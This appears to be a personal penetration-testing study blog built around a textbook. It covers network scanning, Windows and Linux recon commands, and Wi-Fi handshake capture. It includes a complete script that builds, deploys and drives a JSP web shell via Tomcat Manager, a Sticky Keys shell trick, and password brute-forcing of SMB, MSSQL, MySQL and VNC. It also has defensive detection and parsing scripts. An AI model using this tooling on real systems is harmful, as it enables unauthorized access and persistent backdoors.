Thursday, December 26, 2024

Scanning the network for open ports.

 Exploring My Network with Nmap

A couple of days ago, I used a tool called Wifite to crack the Wi-Fi password for my wireless access point. Today, I’m diving deeper into my network using a few commands.

First, I executed the following command to scan for open ports:

bash

sudo nmap -p 22,80,443 192.168.8.1/24

This command revealed open ports on several IP addresses within my network:

192.168.8.1 – GL Technologies

Port 22: SSH

Port 80: HTTP

192.168.8.178 – Raspberry Pi

Port 22: SSH

Port 80: HTTP

When I attempted to connect to 192.168.8.178, I encountered a website titled "McCabe Cousins."

Next, I ran a more comprehensive scan with the command:

bash

sudo nmap -p 1-65535 192.168.8.178

This scan provided a list of open ports:

Port 22

Port 23

Port 80

Port 9000

Port 32967

Interestingly, it seems there is a game called Zork running on port 23! Additionally, I found that Portainer.io is active on port 9000, and a File Browser service is running on port 32967.

Stay tuned as I continue to explore my network and uncover more insights!

* This blog entry was formatted using perplexity.ai


Sunday, December 22, 2024

Key Commands and Techniques in Network Penetration Testing: Insights from The Art of Network Penetration Testing

In network penetration testing, understanding the system environment and being able to execute specific commands can be crucial in gathering information and performing various actions. The book The Art of Network Penetration Testing by Royce Davis offers several techniques for gathering information from both Windows and Linux systems. These commands can help testers assess the system’s state and potentially uncover vulnerabilities. Below are some essential commands and an interesting security bypass technique:

Commands for Gathering Information

For Windows Systems:

  • IP Address Information:
    ipconfig /all
  • Environment Variables:
    set
  • List Current Directory (hidden files only; dir /a shows everything):
    dir /ah
  • Copy a File:
    copy from to
  • Search a File for a String (case-insensitive):
    type file | find /i "string"
  • List Running Processes (verbose, with owning user):
    tasklist /v
  • Display a File's Contents:
    type file

For Linux Systems:

  • IP Address Information:
    ifconfig (or ip addr on distributions that no longer ship ifconfig)
  • Environment Variables:
    export (lists exported variables; env shows the full environment)
  • List Current Directory:
    ls -lah
  • Copy a File:
    cp from to
  • Search a File for a String:
    cat file | grep string
  • List Running Processes:
    ps aux
  • Display a File's Contents:
    cat file

Sticky Keys Exploit

A well-known technique for getting a shell at the Windows logon screen abuses the Sticky Keys accessibility feature: the system file sethc.exe is replaced with a copy of cmd.exe. Pressing Shift five times at the logon screen then makes Windows launch the Sticky Keys helper, which is now a command prompt, and because nobody has signed in yet that prompt runs as NT AUTHORITY\SYSTEM. The swap itself requires that you already have administrative access to the machine (or offline access to its disk), so it is a persistence and privilege-escalation trick rather than a remote exploit.

Before the file can be overwritten, its permissions have to be loosened. The following command grants the local Administrators group full control over sethc.exe:

cmd
cmd.exe /C echo Y | c:\windows\system32\cacls.exe c:\windows\system32\sethc.exe /E /G BUILTIN\Administrators:F

Here cacls.exe edits the existing ACL (/E) and grants (/G) Full Control (F) to BUILTIN\Administrators, who by default hold only Read & Execute on binaries in System32; the echo Y answers the "Are you sure (Y/N)?" prompt so the command runs unattended. Once the ACL is changed, copy cmd.exe over sethc.exe. Two caveats: on Windows Vista and later these files are owned by TrustedInstaller, so you may first need takeown /f c:\windows\system32\sethc.exe before the ACL edit succeeds, and the technique is noisy on modern systems, since endpoint protection products commonly flag accessibility binaries being overwritten and sfc /scannow restores the original file.
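The defensive side of this technique, as an added example that is not from the book or the original post: a shell script for a Linux analysis host that, pointed at the System32 directory of a mounted Windows volume, checks whether any of the accessibility helpers Windows can launch at the logon screen is byte-identical to cmd.exe or powershell.exe. It goes beyond sethc.exe to utilman.exe, osk.exe and the rest of that family, because the same swap works for each of them. The binary names are real; the mount path in the usage line is an assumption.

```shell
#!/usr/bin/env bash
# Added example: offline check for the Sticky Keys / accessibility-binary swap.
# Point it at the System32 directory of a mounted Windows volume, e.g.
# /mnt/win/Windows/System32 (that mount path is an assumption). It prints one
# line per helper and returns 1 if any helper is byte-identical to a shell.

file_hash() {
    # SHA-256 of a file with GNU coreutils or, failing that, BSD/macOS shasum.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d ' ' -f1
    else
        shasum -a 256 "$1" | cut -d ' ' -f1
    fi
}

find_ci() {
    # Case-insensitive lookup of file name $2 directly under directory $1
    # (NTFS is case-preserving, so sethc.exe and SETHC.EXE are the same file).
    find "$1" -maxdepth 1 -iname "$2" -print -quit 2>/dev/null
}

check_accessibility_swaps() {
    local sys32="$1" suspect=0 shell_hashes="" s h p hh hit entry
    # Shells an attacker typically copies over an accessibility helper.
    local shells="cmd.exe powershell.exe"
    # Helpers launched at the logon screen as SYSTEM: Sticky Keys (Shift x5),
    # Ease of Access (Win+U), On-Screen Keyboard, Narrator, Magnifier and
    # Display Switch (Win+P).
    local helpers="sethc.exe utilman.exe osk.exe narrator.exe magnify.exe displayswitch.exe"

    # Hash each shell once; entries look like "<sha256>:cmd.exe".
    for s in $shells; do
        p=$(find_ci "$sys32" "$s")
        [ -n "$p" ] && shell_hashes="$shell_hashes $(file_hash "$p"):$s"
    done

    for h in $helpers; do
        p=$(find_ci "$sys32" "$h")
        if [ -z "$p" ]; then
            echo "MISSING  $h"
            continue
        fi
        hh=$(file_hash "$p")
        hit=""
        for entry in $shell_hashes; do
            [ "${entry%%:*}" = "$hh" ] && hit="${entry#*:}"
        done
        if [ -n "$hit" ]; then
            echo "SUSPECT  $h is byte-identical to $hit"
            suspect=1
        else
            echo "OK       $h"
        fi
    done
    return "$suspect"
}

# Usage: check_accessibility_swaps /mnt/win/Windows/System32 || echo "tampering found"
```

A byte-for-byte match is the simplest form of this swap; a more careful attacker can drop a differently built shell, so on a live system pair this with a signature check of each helper (Get-AuthenticodeSignature in PowerShell) and a look at the Image File Execution Options registry key, which is the other common way to hijack these binaries.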

Conclusion

As network penetration testers, understanding the environment and knowing the key commands for both Windows and Linux systems is fundamental. Techniques like the Sticky Keys swap, which is not a patched vulnerability but an abuse of a trusted accessibility binary that still works wherever an attacker already holds administrative or offline disk access, serve as reminders of the importance of securing user access points, and of full-disk encryption such as BitLocker, which stops the offline variant.

For more in-depth penetration testing techniques, The Art of Network Penetration Testing by Royce Davis is a valuable resource. The techniques discussed above (pages 95-96) provide testers with powerful tools for assessing system security and identifying potential vulnerabilities.

Saturday, December 21, 2024

Capturing a WPA2 Handshake

I recently captured a WPA2 handshake for a wireless test network using wifite with the --no-wps --no-pmkid options. The captured file was uploaded to an online service for password analysis.

This process demonstrates the importance of using strong, secure passwords to protect Wi-Fi networks. Stay tuned for updates and more cybersecurity insights! 





12/21/2024

 Focused Penetration Testing: Creating a Malicious Web Shell Backdoor

In this blog post, we will dive into two critical techniques in penetration testing: creating a web shell application and using a script console as a backdoor payload. These methods are commonly used for web application exploitation and gaining remote access to servers.

Step-by-Step Guide: Creating a Malicious Web Shell WAR File

A web shell is a powerful tool that allows attackers to execute commands on a vulnerable server remotely. One of the most effective ways to deploy a web shell is by using a WAR file (Web Application Archive) on an Apache Tomcat web server. Below is a detailed guide on how to create and deploy a malicious WAR file containing a simple web shell.

1. Setting Up the Web Shell Directory

Begin by creating a directory on your local machine for the web shell files. You can use the following commands:

bash
mkdir webshell
cd webshell

2. Creating the Web Shell Script

Next, create the index.jsp file where the malicious code will reside. This file will act as your web shell. Use the command below to create the file:

bash
touch index.jsp

Open the index.jsp file and paste in the JSP web shell (the script on page 90 of The Art of Network Penetration Testing, the book this series follows). That script lets you execute commands on the server remotely once the WAR is deployed.

3. Packaging the Web Shell into a WAR File

To package the web shell into a WAR file, use the following command to generate the archive:

bash
jar cvf ../webshell.war *

This will create a webshell.war file that contains your index.jsp and any other necessary files.

4. Uploading the WAR File to Apache Tomcat

Once the WAR file is created, deploy it to the Tomcat server. The usual route on an engagement is the Tomcat Manager application (/manager/html, or its text API at /manager/text/deploy) using credentials you have already recovered; deploying a WAR is exactly what the manager's "Deploy" form is for. If you have shell or file-transfer access to the host instead, copying the WAR into Tomcat's webapps directory is enough, because Tomcat auto-deploys anything that appears there.

5. Accessing and Executing the Web Shell

After deployment, browse to the new context on the server, typically http://<host>:8080/webshell/ (the context name is the WAR's file name without .war). Nothing needs to be made executable: Tomcat compiles index.jsp into a servlet on the first request. From that point the web shell runs whatever commands you pass it, as the account the Tomcat service runs under, and you can use it to explore the system further.
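The whole procedure in one script, as an added example that is not the book's page-90 JSP nor code from the original post: it writes a minimal JSP web shell of its own, packages it as a WAR, deploys it through the Tomcat Manager text API and runs a command through it. The host, credentials and context path in the usage lines are placeholders.

```shell
#!/usr/bin/env bash
# Added example: build the web shell WAR, deploy it through the Tomcat
# Manager API, then run a command through it. Host, credentials and context
# path in the usage lines are placeholders.

# Steps 1-3: write a minimal JSP web shell into directory $1 and package it as WAR $2.
build_webshell_war() {
    local dir="$1" war="$2"
    mkdir -p "$dir"
    # Absolute path for the archive, since we cd into $dir to package it.
    war="$(cd "$(dirname "$war")" && pwd)/$(basename "$war")"
    # The JSP runs the value of ?cmd= and returns its stdout. Tomcat compiles
    # it on the first request, so nothing has to be made executable.
    cat > "$dir/index.jsp" <<'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    out.println("<pre>");
    while ((line = r.readLine()) != null) { out.println(line); }
    out.println("</pre>");
}
%>
EOF
    # A WAR is just a ZIP with the web content at its root: jar from a JDK,
    # zip, or Python's zipfile module all produce one that Tomcat will deploy.
    ( cd "$dir" &&
      if command -v jar >/dev/null 2>&1; then jar cf "$war" *
      elif command -v zip >/dev/null 2>&1; then zip -qr "$war" *
      else python3 -m zipfile -c "$war" *
      fi )
}

# Step 4: deploy (or redeploy, thanks to update=true) via the Manager text API.
# The account needs the manager-script role; Tomcat replies
# "OK - Deployed application at context path [...]" on success.
tomcat_deploy() {
    local base="$1" user="$2" pass="$3" war="$4" ctx="$5"
    curl -s -u "$user:$pass" -T "$war" "$base/manager/text/deploy?path=$ctx&update=true"
}

# Step 5: run one command through the deployed shell. Runtime.exec(String)
# tokenises on whitespace and ignores quotes, so keep commands simple
# (id, whoami, ls /tmp) rather than shell pipelines.
webshell_exec() {
    local base="$1" ctx="$2" cmd="$3"
    curl -sG "$base$ctx/index.jsp" --data-urlencode "cmd=$cmd"
}

# Usage (placeholders):
#   build_webshell_war ./webshell ./webshell.war
#   tomcat_deploy http://10.0.10.1:8080 tomcat s3cret ./webshell.war /webshell
#   webshell_exec  http://10.0.10.1:8080 /webshell id
```

Remove the context with /manager/text/undeploy?path=/webshell when the engagement is over; a forgotten web shell is a real backdoor for whoever finds it next.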

Conclusion: Effective Use of Web Shells in Penetration Testing

By following these steps, you can successfully create and deploy a web shell on an Apache Tomcat server. This method is an essential technique in penetration testing for gaining access to vulnerable web servers. Always remember to use these tools ethically and only in environments where you have explicit permission to conduct security testing.

Wednesday, December 18, 2024

12/18/2024

Windows 7 and Windows Server 2008 R2 systems that never received the MS17-010 update are vulnerable to EternalBlue. To check a list of hosts, use the following commands in Metasploit:

bash
use auxiliary/scanner/smb/smb_ms17_010
set rhosts file:/home/we6jbo/windows.txt
run

The OS string "Professional 7601 Service Pack 1 x64" in the scanner's output identifies Windows 7 SP1 (build 7601), which is vulnerable unless the MS17-010 patch has been applied.
To try a variety of passwords, use this command:

bash
cme smb discovery/hosts/windows.txt --local-auth -u Administrator -p passwords.txt

To attack a Microsoft SQL Server (MSSQL, TCP 1433), try the default sa account with a password list using the following Metasploit module:

bash
use auxiliary/scanner/mssql/mssql_login
set username sa
set pass_file /home/we6jbo/password.txt
set rhosts file:/home/we6jbo/mssql.txt
run

MySQL (TCP 3306, default account root) is a different service; Metasploit's auxiliary/scanner/mysql/mysql_login module works the same way against it. If that module reports "Unsupported target", the MySQL server is rejecting connections from your IP (MySQL restricts which hosts each account may connect from), and Medusa confirms it:

bash
medusa -M mysql -H discovery/hosts/mysql.txt -u root -P password.txt

When that is the case you see MySQL's "Host ... is not allowed to connect to this MySQL server" error rather than ordinary failed logins. Brute-forcing VNC can be achieved with the following Metasploit module:

bash
use auxiliary/scanner/vnc/vnc_login
set rhosts file:/home/we6jbo/vnc.txt
set pass_file /home/we6jbo/passwords.txt
run

WAR Files:
WAR stands for Web Application Archive, often used with Apache Tomcat.

Webshot Tool:
Webshot takes Nmap's XML output for the discovered web services and captures a screenshot of each site. To set it up:

bash
git clone https://github.com/R3dy/webshot.git
cd webshot
bundle install
gem install thread
wget http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.54-1ubuntu1.1_amd64.deb
sudo dpkg -i libpng12-0_1.2.54-1ubuntu1.1_amd64.deb

To see the options, then run Webshot against the web services found by the service sweep:

bash
./webshot.rb -h
~/git/webshot/webshot.rb -t discovery/services/web.xml -o documentation/screenshots

This information is for educational purposes only and should be used only in environments where you have explicit permission.

Please be responsible and focus on securing systems and understanding vulnerabilities rather than exploiting them maliciously. Using these techniques without authorization is illegal and unethical.

Sunday, December 15, 2024

12/15/2024

Network Scanning and Vulnerability Detection with Nmap and Ruby

Nmap Commands for IP Discovery

To perform a network sweep for active IPs, you can use the following Nmap command. This will scan a list of IP ranges and output the results to a file:

bash
sudo nmap -sn -iL discovery/range.txt -oA discovery/hosts/pingsweep -PE

Next, use grep to extract only the IPs that are up:

bash
grep "Up" pingsweep.gnmap | cut -d " " -f2 > targets.txt

Note: Expect these sweeps to be noticed. An ICMP sweep across whole ranges is exactly what a Network Operations Center (NOC) or SOC alerts on, so on a real engagement make sure the client knows when scanning starts.

Common Open Ports

When scanning networks, certain ports are typically open:

  • Microsoft Remote Desktop (TCP 3389)
  • Secure Shell (SSH) (TCP 22, 2222)
  • HTTP/HTTPS (TCP 80, 443)

Scan Specific Ports

To scan for common ports (22, 80, 443, 3389, 2222), use the following Nmap command:

bash
nmap -Pn -n -p 22,80,443,3389,2222 -iL discovery/range.txt -oA discovery/hosts/rmisweep --min-hostgroup 256 --min-rate 1280

To list the hosts that had at least one of those ports open (cut keeps only the IP, which is the second whitespace-separated field of each matching line):

bash
cat discovery/hosts/rmisweep.gnmap | grep open | cut -d " " -f2
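The grep/cut pipeline above, like the one used on the quick-sweep results further down, only ever prints the IP column; the port numbers and service names live in the "Ports:" field of each .gnmap line. The following is an added example, not code from the original post or the book, that parses that field properly and also produces the comma-separated port list the Ruby parser below builds for a focused follow-up scan. The sample scan output inside it is constructed, not real.

```shell
#!/usr/bin/env bash
# Added example: parse Nmap's greppable (.gnmap) output properly instead of
# relying on `cut -f2`, which only returns the IP column.
# Each "Ports:" entry has the form
#   port/state/proto/owner/service/rpcinfo/version/
# entries are separated by ", " and the line's fields are tab-separated.

# Print ip,port,proto,service for every open port (reads the files given as
# arguments, or stdin when none are given).
gnmap_open_ports() {
    awk '
    BEGIN { FS = "\t" }
    /^Host: .*Ports: / {
        split($1, h, " "); ip = h[2]
        ports = ""
        for (i = 2; i <= NF; i++)
            if ($i ~ /^Ports: /) ports = substr($i, 8)
        # Split on "/, " rather than ", " so a version string that contains
        # a comma does not break an entry apart.
        n = split(ports, entry, "/, ")
        for (j = 1; j <= n; j++) {
            split(entry[j], f, "/")
            if (f[2] == "open") printf "%s,%s,%s,%s\n", ip, f[1], f[3], f[5]
        }
    }' "$@"
}

# Unique, sorted open ports as an nmap -p argument (e.g. 22,80,9000) for a
# focused -sV/-A follow-up scan.
gnmap_open_port_list() {
    gnmap_open_ports "$@" | cut -d, -f2 | sort -un | paste -s -d ',' -
}

# Constructed sample in the .gnmap format (not real scan output) so the
# functions can be exercised offline; the OpenSSH entry carries a comma in
# its version string on purpose.
sample_gnmap() {
    printf '# Nmap 7.94 scan initiated as: nmap -p 22,23,80,443,9000 -oA rmisweep 192.168.8.0/24\n'
    printf 'Host: 192.168.8.1 ()\tStatus: Up\n'
    printf 'Host: 192.168.8.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (2)\n'
    printf 'Host: 192.168.8.178 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Raspbian 10+deb10u2, protocol 2.0/, 23/open/tcp//telnet///, 80/open/tcp//http///, 9000/open/tcp//cslistener///\tIgnored State: closed (1)\n'
    printf '# Nmap done -- 2 IP addresses (2 hosts up) scanned\n'
}

# Usage: gnmap_open_ports discovery/hosts/rmisweep.gnmap
#        gnmap_open_port_list services/quick-sweep.gnmap
#        gnmap_open_ports services/quick-sweep.gnmap | cut -d, -f1 | sort -u   # hosts only
```

Only the service name column (field 5) is printed; the version column is where Nmap escapes slashes as "\/", so if you extend the parser to print it, unescape that field after splitting.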

Alternative Methods for Finding IPs

You can also find IPs through DNS. A forward lookup of a hostname you already know, such as mail.jeremiahonealtechsupport.com (for example with host or dig), gives you its address, and reverse (PTR) lookups across a range can reveal hostnames, and therefore roles, for the addresses you find.

Find Live Subnets in a /8

The following command is not a single-subnet scan: the target 10.0-255.0-255.1 expands to the .1 address of every /24 inside 10.0.0.0/8 (10.0.0.1, 10.0.1.1, ... 10.255.255.1), so it is a quick way to find which /24s are in use on a large private network, on the assumption that the gateway usually sits at .1:

bash
sudo nmap -sn 10.0-255.0-255.1 -PE --min-hostgroup 10000 --min-rate 10000

Discover Network Services

To sweep for open ports across a list of hosts, use the following Nmap command:

bash
nmap -Pn -n -p 22,25,53,80,443,445,1433,3306,3389,4800,5900,8080,8443 -iL hosts/targets.txt -oA services/quick-sweep

To check for open ports in the scan results, use this command:

bash
cat services/quick-sweep.gnmap | grep open

To perform a full TCP scan on all ports, use:

bash
nmap -Pn -n -iL hosts/targets.txt -p 0-65535 -sV -A -oA services/full-sweep --min-rate 50000 --min-hostgroup 22

Ruby Script to Parse Nmap Results

Here’s a Ruby script that parses Nmap’s XML output and extracts information about open ports:

ruby
#!/usr/bin/env ruby
require 'rubygems'
require 'nmap/parser'   # gem install nmap-parser

# Check for input argument
if ARGV.empty?
  puts "Usage: #{$PROGRAM_NAME} <nmap_xml_output>"
  exit(1)
end

# Parse Nmap XML file
nmap_file = ARGV[0]
parser = Nmap::Parser.parsefile(nmap_file)

# Iterate through hosts that were up
parser.hosts("up") do |host|
  portstring = ""
  # Iterate through open ports
  host.ports("open") do |port|
    service = port.service
    # Print port details as one CSV row
    puts "#{host.addr}, #{port.num}, #{service.name}, #{service.product}, #{service.version}, #{service.extrainfo}"
    # Build a comma-separated list of ports for later use
    portstring << "#{port.num},"
  end
  # Generate Nmap command for further enumeration (chop drops the trailing comma)
  unless portstring.empty?
    puts "sudo nmap -sS -p #{portstring.chop} -sV -A -vv -oA enumeration -iL ranges.txt"
  end
end

Export Full Sweep Results to CSV

To convert the full-sweep results into a CSV file, run the script above (saved as parsenmap.rb and made executable) against the XML output:

bash
./parsenmap.rb services/full-sweep.xml > services/all-ports.csv

The script also prints the suggested follow-up nmap command for each host, so those lines land in the CSV too; filter them out with grep -v '^sudo nmap' if you want pure CSV.

EternalBlue (MS17-010) Vulnerability

MS17-010 is the Microsoft bulletin for a set of critical flaws in Microsoft's SMBv1 implementation, patched in March 2017; EternalBlue, the exploit that made it famous, targets CVE-2017-0144. It allows remote code execution (RCE) on unpatched systems, giving attackers SYSTEM-level access and a way to propagate malware across networks. EternalBlue was used in the WannaCry and NotPetya ransomware attacks, which disrupted systems globally by targeting vulnerable SMBv1 services. To detect the vulnerability, scan port 445 with Nmap's smb-vuln-ms17-010 script (nmap -p 445 --script smb-vuln-ms17-010 <targets>). Mitigation involves applying the MS17-010 patch, disabling SMBv1, and restricting access to SMB ports. The incident highlights the importance of patching systems and disabling outdated protocols to prevent widespread exploitation and worm-like propagation.

Thursday, December 12, 2024

Dec 12, 2024

Enumerating information on the network such as hostnames and IP addresses. Create a file called test.txt listing the in-scope targets and a file called ignore.txt listing hosts that are out of scope. For legal reasons, nothing in ignore.txt should ever be tested.

Footprinting: Enumerating information with no knowledge about system.

https://github.com/r3dy/capsulecorp-pentest

Pingsweep:

for octet in {1..254}; do ping -c 1 -W 1 192.168.8.$octet >> pingsweep.txt & done; wait

cat pingsweep.txt | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 > targets.txt

cat targets.txt

The trailing wait lets all 254 background pings finish before the file is read; the cut picks the fourth field of each "64 bytes from 192.168.8.1: icmp_seq=1 ..." line and strips the trailing colon. The {1..254} expansion needs bash, and -W 1 is the Linux ping timeout flag.
